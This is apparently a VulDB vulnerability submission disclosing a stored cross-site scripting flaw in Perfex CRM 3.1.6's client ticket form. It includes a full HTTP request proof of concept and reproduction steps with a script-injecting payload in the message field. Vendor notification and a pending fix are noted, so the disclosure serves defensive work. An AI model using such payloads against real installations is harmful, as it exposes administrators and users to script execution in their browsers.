Submit #408014: Perfex Perfex CRM 3.1.6 Cross Site Scriptinginfo

TitlePerfex Perfex CRM 3.1.6 Cross Site Scripting
DescriptionA stored Cross-Site Scripting (XSS) vulnerability was identified in Perfex CRM, specifically in the open ticket functionality. This vulnerability allows an attacker to inject malicious JavaScript into the message parameter of the ticket submission form, which is stored on the server and executed when administrators or other users view the ticket. The vendor has acknowledged the issue and provided a temporary fix, with a patch pending in a future release. CodeCanyon, the platform hosting Perfex CRM, has also initiated their process to ensure the vulnerability is addressed. The developer and CodeCanyon have been informed of the vulnerability. The developer confirmed the issue and provided a temporary fix, while an official solution is waiting to be released. CodeCanyon also said they are actively working with the developer to make sure the problem is fixed. Proof of Concept: POST /perfex/clients/open_ticket HTTP/1.1 Host: 192.168.1.16 Content-Length: 958 Cache-Control: max-age=0 Accept-Language: en-US Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.16 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYOUSBSv8TScP0MN8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.16/perfex/clients/open_ticket Accept-Encoding: gzip, deflate, br Cookie: csrf_cookie_name=5edada6dd436d0f723d69b2f2d22d692; contact_language=english; sp_session=mth17comeclv6jp5ijtgf1gnnbvb91gc Connection: keep-alive ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="csrf_token_name" 5edada6dd436d0f723d69b2f2d22d692 ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="subject" XSS Proof ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="project_id" ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="department" 1 ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="priority" 2 ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="service" 1 ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="message" XSS Proof <body onload=alert("Vulnerable")> ------WebKitFormBoundaryYOUSBSv8TScP0MN8 Content-Disposition: form-data; name="attachments[0]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryYOUSBSv8TScP0MN8-- a malicious payload is injected into the message field, which, when viewed by an admin or any user, triggers the JavaScript alert. Steps to Reproduce: 1. Navigate to the open ticket form on the Perfex CRM client portal. 2. Submit the form, injecting the following payload into the message parameter: <body onload=alert("Vulnerable")> 3. The payload is successfully stored in the system. When an admin or any user views the ticket, the malicious script is executed in the victim's browser.
Source⚠️ https://bytium.com/stored-cross-site-scripting-xss-vulnerability-in-perfex-crm/
User
 suffer (UID 74855)
Submission09/13/2024 18:28 (2 years ago)
Moderation09/14/2024 10:06 (16 hours later)
StatusAccepted
VulDB entry277504 [Perfex CRM 3.1.6 Parameter Clients.php Message cross site scripting]
Points20

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!